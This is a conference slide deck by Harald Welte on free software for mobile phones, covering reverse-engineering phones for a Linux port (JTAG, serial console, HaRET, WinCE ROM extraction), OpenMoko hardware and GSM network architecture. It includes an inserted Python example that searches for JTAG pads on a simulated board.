%include "default.mgp"
%default 1 bgrad
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
%nodefault
%back "blue"
%center
%size 7
Free and Open Source Software in the Mobile World
%center
%size 4
by Harald Welte
netfilter.org / openmoko.org / openpcd.org
gpl-violations.org / openezx.org / gnufiish.org
berlin.ccc.de / openBSC.gnumonks.org
deDECTed.org / hmw-consulting.de / viatech.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Introduction

Who is speaking to you?
	an independent Free Software developer, consultant and trainer
	15 years of experience using, deploying and developing for Linux on servers and workstations
	12 years of professional experience doing Linux system- and kernel-level development
	strong focus on network security and embedded systems
	expert in Free and Open Source Software (FOSS) copyright and licensing
	digital board-level hardware design, esp. embedded systems
	active developer and contributor to many FOSS projects
	thus, a techie, who will therefore not have fancy animated slides ;)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Why?

Why?
	For the same reason you have FOSS in other areas
		You can run a 100% FOSS Personal Computer / Laptop
		The majority of all consumer electronics network gear runs Linux
			DSL routers, WiFi access points, Network Attached Storage
	To enable people to exercise the core freedoms
		to study and understand the software
		to share the software with others
		to modify, and run + share modified versions
	Because the mobile world is 100% proprietary and anti-competitive
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The closed Mobile World

Compare the Mobile world with the PC world
	In the PC world
		you buy some more or less standardized hardware
		you have the freedom to install whatever OS on it
		you have the freedom to install whatever Apps on it
		you can run it 100% based on FOSS and get the freedoms
		you connect to communications networks with a (DSL) modem
		the network protocol stack (TCP/IP, WiFi, ISDN) runs on the PC
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The closed Mobile World

Compare the Mobile world with the PC world
	In the Mobile world
		you buy some product (mobile phone)
		the product ships with a pre-installed OS and Apps
		the manufacturer does everything to prevent you from installing an OS of your choice
		there is no single product/solution based on 100% FOSS
		the network protocol stack (GSM/GPRS/UMTS) runs in proprietary firmware
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The closed Mobile World

It gets even worse....
	The phone maker and/or operator have remote control over
		reading/writing entries of your phonebook
		making your phone send SMS
		making your phone place phone calls
		updating/changing the software over the air (FOTA)
		preventing you from using the Bluetooth/USB interface the way you want
			transfer ringtones, make backups, tethering
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
The closed Mobile World

So the end result
	You buy a product for _a lot_ of money...
	... but you don't _own_ the product. The manufacturer or operator does
	So why should you pay money?
		If it is yours, you decide what it does or doesn't do.
		If the operators want to own the phone, they should rent it to you, not sell it.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
How can we free the phone

We can free the mobile phone world by:
	building more open hardware
		hard, since most chips/components are very FOSS-unfriendly
	developing FOSS-based OS/middleware/applications
		easily possible, but hard without open hardware
	developing a FOSS GSM protocol stack
		extremely hard, tight NDAs and business conduct basically prevent anyone from entering the market
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
How can we free the phone

FOSS for mobile phones
	HTC-Linux / xda-developers project
		reverse-engineering of HTC smartphones
	OpenEZX.org
		reverse-engineering Motorola EZX and MAGX phones
	gnufiish.org
		reverse-engineering E-TEN glofiish phones
	openmoko.org
		designing and building open, FOSS-friendly phones
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Reverse Engineering

Reverse Engineering projects
	are always late
		they start after the product ships
	are getting harder and harder
		many new System-on-a-Chip have docs under NDA
		frequent use of FPGA or CPLD or custom ASIC
		cryptographic signatures in the boot loader
	very rarely have a big impact
		the software might be complete when the hardware is end-of-life
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Reverse Engineering

How to find such a Linux-friendly device?
	Look at hardware details of available devices
		Use Google to find out what hardware they use
		Use the FCC database to get PCB photographs
		Look at Windows Mobile (WM) firmware images (registry/...)
	At some point you buy one and take it apart
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Linux-friendly hardware

I went through this process
	I found the E-TEN glofiish devices
	They are very similar to Openmoko
		Samsung S3C2442 SoC
		MCP with NAND+SDRAM
		TD028TTEC1 full-VGA LCM
	Other hardware parts reasonably supported/known
		Marvell 8686/libertas WiFi (SPI attached)
		SiRF GPS (UART attached)
		CSR Bluetooth (UART attached)
	Only some unknown parts
		CPLD for power management and keyboard matrix
		Ericsson GSM Modem (AT command set documented!)
		Cameras (I don't really care)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Project gnufiish

Project 'gnufiish'
	Port Linux to the E-TEN glofiish devices
		Initially to the M800 and X800
		Almost all glofiish have very similar hardware
	Openmoko merges all my patches in their kernel!
	Official inclusion in the Openmoko distribution
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Project gnufiish

gnufiish Status
	Kernel (2.6.24/2.6.27) booted on _first attempt_
	Working
		I2C host controller
		I2C communication to CPLD and FM Radio
		USB Device mode (Ethernet gadget)
		Touchscreen input
		LCM Framebuffer
		LCM Backlight control
		GPS and Bluetooth power control
		GPIO buttons
	In the works
		Audio Codec driver (50% done)
		GSM Modem (SPI) driver (80% done)
		M800 Keyboard + Capsense driver (25% done)
		SPI glue to libertas WiFi driver (70% done)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
HOWTO

How was this done?
	Various reverse engineering techniques
		Take the actual board apart, note major components
		Use HaRET (hardware reverse engineering tool)
		Find + use JTAG testpads
		Find + use serial console
		Disassemble WinMobile drivers
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Take hardware apart

Opening the case and voiding your warranty
%image "x800_backside_nobat_nocover.jpg"
Note the convenient test pads beneath the battery
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Take hardware apart

Opening the case
%image "x800_opening_the_case.jpg" 800x600
If you have a bit of experience in taking apart devices, you can do that without any damage...
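The "Find + use JTAG testpads" step above works because JTAG is a shift register: what you clock in on TDI comes out on TDO a fixed number of clocks later, so a search can drive three candidate pads plus TMS and look for its own pattern on a fourth. This is an added example, not code from gnufiish or from Hunz's jtagfinder: a brute-force pad search run against a simulated board. The pad numbering, the IDCODE value (0x1A2B3C4D), the IR opcode and the two decoy pads (a buffered copy of TDI and a free-running clock) are constructed.

```python
"""Brute-force JTAG pad search over a simulated board.
Added example, not jtagfinder or gnufiish code; board wiring and IDCODE are constructed."""
import itertools

# IEEE 1149.1 TAP controller: state -> (next state if TMS=0, next state if TMS=1)
TAP_NEXT = {
    "TLR": ("RTI", "TLR"), "RTI": ("RTI", "SELDR"),
    "SELDR": ("CAPDR", "SELIR"), "CAPDR": ("SHDR", "EX1DR"), "SHDR": ("SHDR", "EX1DR"),
    "EX1DR": ("PAUDR", "UPDR"), "PAUDR": ("PAUDR", "EX2DR"), "EX2DR": ("SHDR", "UPDR"),
    "UPDR": ("RTI", "SELDR"), "SELIR": ("CAPIR", "TLR"), "CAPIR": ("SHIR", "EX1IR"),
    "SHIR": ("SHIR", "EX1IR"), "EX1IR": ("PAUIR", "UPIR"), "PAUIR": ("PAUIR", "EX2IR"),
    "EX2IR": ("SHIR", "UPIR"), "UPIR": ("RTI", "SELDR"),
}

class Tap:
    """One TAP with a 4-bit IR; after reset the IR selects the 32-bit IDCODE register."""
    IR_LEN, IDCODE_IR = 4, 0b1110                  # constructed opcode

    def __init__(self, idcode):
        self.idcode, self.state, self.ir = idcode, "TLR", self.IDCODE_IR
        self.dr, self.dr_len, self.tdo = 0, 32, 0

    def clock(self, tms, tdi):
        # rising edge: the selected register shifts TDI in, then the state advances on TMS
        if self.state == "SHDR":
            self.dr = (self.dr >> 1) | (tdi << (self.dr_len - 1))
        elif self.state == "SHIR":
            self.ir = (self.ir >> 1) | (tdi << (self.IR_LEN - 1))
        self.state = TAP_NEXT[self.state][tms]
        if self.state == "TLR":
            self.ir = self.IDCODE_IR
        elif self.state == "CAPDR":             # any other IR value behaves as BYPASS (1 bit)
            self.dr, self.dr_len = (self.idcode, 32) if self.ir == self.IDCODE_IR else (0, 1)
        # falling edge: TDO presents the bit about to leave the selected register
        self.tdo = {"SHDR": self.dr & 1, "SHIR": self.ir & 1}.get(self.state, 0)

class FakeBoard:
    """Eight test pads with secret wiring; the finder only ever calls write() and read()."""
    TCK, TMS, TDI, TDO, ECHO, NOISE = 5, 2, 7, 0, 3, 1

    def __init__(self):
        self.tap, self.level, self.noise = Tap(0x1A2B3C4D), [0] * 8, 0

    def write(self, pad, v):
        old, self.level[pad] = self.level[pad], v
        if pad == self.TCK and (old, v) == (0, 1):  # a rising edge clocks the TAP
            self.tap.clock(self.level[self.TMS], self.level[self.TDI])

    def read(self, pad):
        if pad == self.TDO:
            return self.tap.tdo
        if pad == self.ECHO:                     # buffered copy of TDI: looks like a 1-bit chain
            return self.level[self.TDI]
        if pad == self.NOISE:                    # free-running clock on a test pad
            self.noise ^= 1
            return self.noise
        return self.level[pad]

PATTERN = 0xA5C3F00D
PATTERN_BITS = [(PATTERN >> i) & 1 for i in range(32)]   # shifted LSB first

def pulse(board, c, tms, tdi):
    """One TCK cycle on candidate c=(tck,tms,tdi,tdo); returns TDO after the falling edge."""
    tck, tms_pad, tdi_pad, tdo_pad = c
    board.write(tms_pad, tms)
    board.write(tdi_pad, tdi)
    board.write(tck, 1)
    board.write(tck, 0)
    return board.read(tdo_pad)

def find_pattern(bits):
    """Offset >= 1 at which PATTERN emerges, i.e. the register bits between TDI and TDO."""
    return next((d for d in range(1, len(bits) - 31) if bits[d:d + 32] == PATTERN_BITS), None)

def probe(board, c):
    tck, tms, tdi, tdo = c
    # 1. a pad that follows TDI without any clock is a short or a buffer, not a TAP output
    board.write(tck, 0)
    board.write(tdi, 0); a = board.read(tdo)
    board.write(tdi, 1); b = board.read(tdo)
    board.write(tdi, 0)
    if (a, b) == (0, 1):
        return None
    # 2. five clocks with TMS=1 reach Test-Logic-Reset from any state, then walk to Shift-DR
    for _ in range(5):
        pulse(board, c, 1, 0)
    for t in (0, 1, 0):                          # Run-Test/Idle, Select-DR-Scan, Capture-DR
        pulse(board, c, t, 0)
    seen = [pulse(board, c, 0, 0)]               # enter Shift-DR: TDO shows bit 0 of the captured DR
    seen += [pulse(board, c, 0, bit) for bit in PATTERN_BITS + [0] * 64]
    d = find_pattern(seen)
    if d is None:
        return None
    # 3. TMS held high must stop the shifting; if the pattern still emerges, the TMS pad is
    #    wrong and the TAP was merely left in a shift state by an earlier attempt
    for _ in range(5):
        pulse(board, c, 1, 0)
    if find_pattern([pulse(board, c, 1, bit) for bit in PATTERN_BITS + [0] * 64]) is not None:
        return None
    captured = sum(bit << i for i, bit in enumerate(seen[:d]))  # the IDCODE for a 1-device chain
    return {"tck": tck, "tms": tms, "tdi": tdi, "tdo": tdo, "chain_bits": d, "captured_dr": captured}

def find_jtag(board, n_pads):
    """Try every ordered choice of four distinct pads. Driving a pad that is really an
    output is harmless in simulation; on real hardware put series resistors in the probes."""
    for c in itertools.permutations(range(n_pads), 4):
        hit = probe(board, c)
        if hit:
            return hit
    return None

if __name__ == "__main__":
    print(find_jtag(FakeBoard(), 8))
```

The two rejection checks are what keep a brute-force search honest on a real board: a pad that mirrors TDI without a clock edge is a short, not a chain, and a TMS candidate only counts if pulling it high actually stops the data flow.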
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Take hardware apart

The Mainboard with all its shielding covers
%image "x800_mainboard_with_shielding.jpg" 800x600
Obviously, the shielding needs to go
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Take hardware apart

The application processor section
%image "x800_application_processor.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Take hardware apart

The HSDPA modem section
%image "x800_hsdpa_modem.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Take hardware apart

The backside
%image "x800_backside_with_lcm.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
JTAG pins

Find + use JTAG testpads
	JTAG is basically a long shift register
		Input, Output, Clock (TDI, TDO, TCK)
	Therefore, you can try to shift data in and check if/where it comes out
	Automated JTAG search by project "jtagfinder" by Hunz (German CCC member)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
JTAG pins

Find + use JTAG testpads
%image "x800_dbgconn_closeup.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
JTAG pins

Find + use JTAG testpads
%image "x800_debcon_pcb.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
JTAG pins

Find + use JTAG testpads
%image "x800_jtagfinder_probes.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
JTAG pins

Find + use JTAG testpads
%image "x800_jtagfinder.jpg"
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
JTAG pins

Found JTAG pins
	Chain 1
		Samsung S3C2442 Application Processor
		Has standard ARM JTAG ICE
	Chain 2
		CPLD programming interface
	Remaining work
		find the nTRST and nSRST pins
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Serial console

How to find the serial console
	Just run some code that you think writes to it
	Use a scope to find the typical patterns of a serial port
		I haven't actually done (or needed) this on the glofiish yet, but on many other devices
	The RxD pin is harder to find, just trial+error usually works
		as soon as you have some interactive prompt that echoes the characters you write
	Don't forget to add a level shifter from 3.3/5V to RS232 levels
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
What's HaRET

What is HaRET
	a Windows executable program for any WinCE based OS
	offers a control interface on a TCP port
		connect to it using haretconsole (python script) on a Linux PC
	supports a number of popular ARM based SoCs (PXA, S3C, MSM)
	features include
		GPIO state and tracing
		MMIO read/write
		virtual/physical memory mapping
		IRQ tracing (by redirecting IRQ vectors)
		load Linux into RAM and boot it from within WinCE
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Using HaRET

Using HaRET
	run the program on the target device
	connect to it using haretconsole over USB-Ethernet
	read GPIO configuration
		Create a GPIO function map based on the SoC data sheet
	watch for GPIO changes
		separate the signal from the noise
		exclude uninteresting and frequently changing GPIOs
	watch for GPIO changes while performing certain events
		press every button and check
		start/stop peripherals
		insert/eject SD card
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Using HaRET

Using HaRET
	watch for IRQ changes/events, e.g.
		you see DMA3 interrupts while talking to the GSM modem
		read the MMIO config of the DMA controller to determine the user: SPI
		read SPI controller configuration + DMA controller configuration
		find the RAM address of data buffers read/written by DMA
	haretconsole writes logfiles
		you can start to annotate the logfiles
	of course, all of this could be done using JTAG, too.
		but with HaRET, you mostly don't need it!!!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Disassembling WinCE drivers

Disassembling WinCE drivers
	is the obvious thing to do, right?
	is actually not all that easy, since WinCE doesn't allow you to read the DLLs
		not via ActiveSync
		nor via the WinCE filesystem APIs
		Apparently, they are pre-linked and not real files anymore
	luckily, there are tools in the 'ROM cooking' scene
		hundreds of different tools, almost all need a Windows PC
		therefore, not useful to me
	conclusion: Need to understand the ROM image format
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Disassembling WinCE ROM files

Disassembling WinCE ROM files
	'datextract' to extract different portions like the OS image
	'x520.pl' to remove spare NAND OOB sectors from the image and get a file
	split the resulting image into bootsplash, cabarchive and disk image
	'xx1.pl' to split the cabarchive into CAB files
	'partextract' to split the disk image into partitions
	'SRPX2XIP.exe' (wine) to decompress XPRS compressed partition0+1
	'dumpxip.pl' to dump/recreate files in partition0 and 1
	'ImgfsToDump.exe' to dump/recreate files in partition2 (imagefs)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Disassembling WinCE Drivers

Disassembling WinCE Drivers
	Now we finally have the re-created DLLs with the drivers
	Use your favourite debugger/disassembler to take them apart
	I'm a big fan of IDA (Interactive Disassembler)
		The only proprietary software that I license+use in 15 years
		There's actually a Linux x86 version
		Was even using it with qemu on my Powerbook some years back
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
WinCE Registry

WinCE has a registry, too
	I never really understood what this registry is all about, but it doesn't matter ;)
	You can use 'synce-registry' to dump it to Linux
	Contains important information about
		how drivers are interconnected
		various configuration parameters of drivers
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
%center
%size 7
OpenMoko
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
WARNING

While I have been the Lead System Architect for hardware and system level software throughout the first 16 months of the project, I quit working for OpenMoko, Inc. / the FIC group in November 2007.

Thus, I do not officially represent either of these entities!
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
What is OpenMoko

The commercial side
	OpenMoko, Inc. ("OpenMoko, the Company")
		Doing the actual hardware development
		Funding the OpenMoko software R&D
		Responsible for product definition, sales, marketing, PR, ...
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
What is OpenMoko

The community side
	OpenMoko, the overall Free Software project
		A FOSS project working on
			OpenMoko kernel/u-boot patches (hardware support)
			OpenMoko GNU/Linux distribution
			OpenMoko UI / framework
		Funded by OpenMoko, Inc.
	OpenMoko, the embedded GNU/Linux distribution
		An OE-built embedded GNU/Linux distribution for mobile communications devices
		Primarily targeted at OpenMoko/FIC handsets
		Is being ported to other devices by the community
		Maintained by an OE core team member employed by OpenMoko, Inc.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
What is OpenMoko about?
	Open
		Opening up the formerly-closed mobile world on any achievable level
	Mobile
		Mobile devices are the future
	Free
		100% Free Software from driver through UI
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Neo1973 GTA01 hardware

Neo1973 GTA01 hardware (2007)
	S3C2410 SoC @ 266MHz
	2.8" 480x640 LCM, 262k colors
	128MB SDRAM
	64MB SLC NAND (512/16k)
	USB 1.1 device and host (unpowered)
	A-GPS (without processor)
	GSM+GPRS chipset (ARM7 based)
	Wolfson audio codec
	2 stereo speakers (1.2W)
	2.5mm headset jack
	CSR4 based Bluetooth
	NXP PCF50606 power management unit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Neo1973 GTA02 hardware

Neo1973 GTA02 hardware (2008)
	S3C2442B SoC @ 400 MHz (500MHz option)
	2.8" 480x640 LCM, 262k colors
	128MB SDRAM
	256MB SLC NAND (2048/128k)
	USB 1.1 device and host (with power)
	A-GPS (fully autonomous, firmware-based)
	GSM+GPRS chipset (TI Calypso, ARM7 based)
	CSR4 based Bluetooth
	Atheros AR6k based 802.11b/g WiFi
	2 3D accelerometers
	Smedia Glamo 3362 GPU
	NXP PCF50633 power management unit
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Hackable Device

Hackable Device
	Standards compliance wherever possible
	The device shall be under full user control
	Everyone should be able to hack it, at any level
	Make the entry barrier for development as low as possible
		bootloader prompt via USB serial emulation
		Serial console
		JTAG for the people
		Provide a Debug Board with embedded USB JTAG + serial adapter
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
User control

User control
	The phone needs to be under control of the user, and the free software he uses
	Even backdoors or rogue GSM firmware shall not be able to intrude on the privacy of the user
	So we e.g. put the Audio codec (under explicit control from the Linux-running AP) between microphone/speaker and the GSM modem
	So we enable the Linux-running AP to cut the power of the GSM modem
	Thus, free software (and thus the user) remains in ultimate control
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Hackable at any level

Hardware Hacking
	we even encourage hardware hacking
	I2C, SPI, GPIO and IRQ lines on documented test pads and connector
		allows for attachment of new peripherals to the device
	even the hardware schematics are available under a FOSS-permissive NDA
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Hackable at any level

System-level hacking (bootloader, OS)
	entire bootloader from the very first instruction FOSS
	entire kernel including all drivers FOSS
	JTAG accessible on debug connector
	serial console on debug connector
	debug board (USB JTAG adaptor and USB serial converter)
	un-brickable through emergency boot loader in read-only NOR flash (GTA02)
	DFU (Device Firmware Upgrade) for full-system re-flash via USB
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Hackable at any level

Userspace and UI level hacking
	entire userspace world FOSS (libraries, daemons, UI, X driver, ...)
	FOSS build system and toolchain/SDK
		enable anyone to build custom software packages and/or flash images
	provide a programming environment as close as possible to the Linux desktop world
		allow developers to re-use their existing Linux development skills
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
GSM Integration

But you can't hack the GSM stack
	yes, that is true.
	pretty much like you can't hack the firmware of your SCSI or RAID controller, WiFi card, Bluetooth chipset, etc.
	even the firmware of a good old analogue phone line (voice) modem was not hackable
	having proprietary firmware on a dedicated peripheral CPU is even acceptable to the FSF!
	And no doubt, anyone inside OpenMoko would love to have an open source GSM stack. Patches welcome :)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
GSM Integration

But you can't hack the GSM stack
	so you get the maximum level of freedom that you can get with any other peripheral device:
		open source low-level (mux, power mgmt) drivers
		open source high-level drivers (gsm daemon)
		openly documented serial protocol (TS 07.05, 07.07, 07.10)
	asking for more freedom on the GSM side is hypocritical when accepting the very same level with other peripheral devices.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
GSM Integration

But you can't hack the GSM stack
	besides that
		GTA01 has baseband JTAG on test pins
		OpenMoko does not cryptographically sign GSM firmware images
		GSM firmware is user-upgradable
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
OpenMoko
Difference

Difference from other Linux phones
	'others' discourage third parties from writing apps
		you need explicit permission? WTF!
	'others' try to make customers pay for a device that's still under manufacturer / GSM operator control
	'others' use proprietary kernel modules
		locks you into some old kernel version
	'others' use proprietary bootloaders
	'others' don't give you JTAG/serial access
	'others' use proprietary UI toolkits
		vendor lock-in
	'others' don't give out their build system
	'others' don't give out their firmware update tools
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS for the Mobile World
%center
%size 7
FOSS for the GSM network side
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS for the Mobile World
Why FOSS for the network side?

Why?
	For the same reason you might run other networks
		To learn and experiment with technology
		To boldly go where no [free] man has gone before ;)
	Practical demonstration of known GSM security problems
	Raise public awareness about GSM [in]security
		thus increase the incentive for the market to improve
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
Legal Disclaimer

Legal Disclaimer
	Don't try this at home!
	GSM operates on LICENSED spectrum
		Thus, you need approval from the regulatory authority
	Only use the BTS with a dummy load!
	Don't interfere with the operators!
	Our software is strictly for research purposes only
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
GSM Network Architecture

The Hitchhiker's Guide to the GSM Network
	unfortunately does not exist
	The GSM related literature is typically too high-level
	The GSM protocol specifications are publicly available
		but _very_ comprehensive (1,108 PDFs, 414MByte)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
GSM Network Architecture

GSM is a bit-synchronous network
	it draws many analogies from ISDN and SDN
		layer 2 modelled after Q.921 / LAPD
		call signalling modelled after Q.931
		but: many more protocols for mobility management, radio resources, ...
	like all traditional Telco protocols: Intelligence in the network, not in the end nodes.
GSM is a TDMA "nightmare"
	e.g. you never know from/for whom data is without the timing context
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
GSM Network Architecture

	MS	Mobile Station (your Phone)
	BTS	Base Transceiver Station
	BSC	Base Station Controller
	MSC	Mobile Switching Center
	HLR/VLR	Home/Visitor Location Register
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
GSM Base Transceiver Station

BTS
	As the name indicates: "transceiver"
		Handles layer 1 (RF) and some parts of layer 2
		Modulation/Demodulation
		Time multiplex, scheduling of frames
	Is not a "Base Station", i.e. not self-contained
	True 'slave' to the BSC
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%page
FOSS in the Mobile World
GSM Base Station Controller

BSC
	Base Station Controller
	Handles most of the actual decision making
	really controls most aspects of the BTSs
	handles intra-BSC cell handover
